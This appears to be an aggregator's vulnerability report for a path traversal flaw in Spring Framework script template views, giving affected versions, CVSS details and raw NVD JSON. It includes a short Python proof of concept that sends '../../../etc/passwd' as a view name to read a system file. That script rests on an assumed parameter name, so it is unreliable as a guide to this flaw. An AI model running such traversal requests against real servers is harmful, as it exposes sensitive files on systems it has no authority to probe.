Security Vulnerability Report
CVE-2026-22737 CVSS 5.9 MEDIUM

CVE-2026-22737

Published: 2026-03-20 00:16:16
Last Modified: 2026-04-23 14:20:14

Description

Use of Java scripting engine enabled (e.g. JRuby, Jython) template views in Spring MVC and Spring WebFlux applications can result in disclosure of content from files outside the configured locations for script template views. This issue affects Spring Framework: from 7.0.0 through 7.0.5, from 6.2.0 through 6.2.16, from 6.1.0 through 6.1.25, from 5.3.0 through 5.3.46.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* (Spring Framework 7.0.0 - 7.0.5) - VULNERABLE
cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* (Spring Framework 6.2.0 - 6.2.16) - VULNERABLE
cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* (Spring Framework 6.1.0 - 6.1.25) - VULNERABLE
cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* (Spring Framework 5.3.0 - 5.3.46) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (hypothetical endpoint using script template views)
target_url = "http://vulnerable-spring-app/render"

# Payload attempting path traversal against the script template view resolver,
# trying to read /etc/passwd from the server.
payload = {
    # The parameter name depends on the controller configuration; 'viewName' is assumed.
    "viewName": "../../../etc/passwd"
}

try:
    print("[+] Sending exploit request to CVE-2026-22737 vulnerable endpoint...")
    response = requests.get(target_url, params=payload, timeout=10)

    if response.status_code == 200:
        print("[!] Request successful. Checking for file content disclosure...")
        if "root:" in response.text:
            print("[+] Exploit successful! Sensitive file content disclosed:")
            print(response.text[:500])  # Print first 500 chars
        else:
            print("[-] Response received, but file content pattern not found.")
    else:
        print(f"[-] Exploit failed. HTTP Status Code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred during the request: {e}")

References

https://spring.io/security/cve-2026-22737 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22737", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:15.837", "lastModified": "2026-04-23T14:20:14.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of Java scripting engine enabled (e.g. JRuby, Jython) template views in Spring MVC and Spring WebFlux applications can result in disclosure of content from files outside the configured locations for script template views. This issue affects Spring Framework: from 7.0.0 through 7.0.5, from 6.2.0 through 6.2.16, from 6.1.0 through 6.1.25, from 5.3.0 through 5.3.46."}, {"lang": "es", "value": "El uso de vistas de plantilla con motor de scripting de Java habilitado (p. ej., JRuby, Jython) en aplicaciones Spring MVC y Spring WebFlux puede resultar en la divulgación de contenido de archivos fuera de las ubicaciones configuradas para las vistas de plantilla de script. Este problema afecta a Spring framework: de 7.0.0 a 7.0.5, de 6.2.0 a 6.2.16, de 6.1.0 a 6.1.25, de 5.3.0 a 5.3.46."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.3.47", "matchCriteriaId": "E4FC0718-4A47-49D5-B623-285871B5135F"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0", "versionEndExcluding": "6.1.26", "matchCriteriaId": "08D94F4A-EDD9-4CA2-836A-D61B17A4E894"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0", "versionEndExcluding": "6.2.17", "matchCriteriaId": "1168AB82-987E-473E-8485-DE606AF254EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.6", "matchCriteriaId": "1CA275C7-33A7-49A2-ADE8-0ABF81E00327"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-22737", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}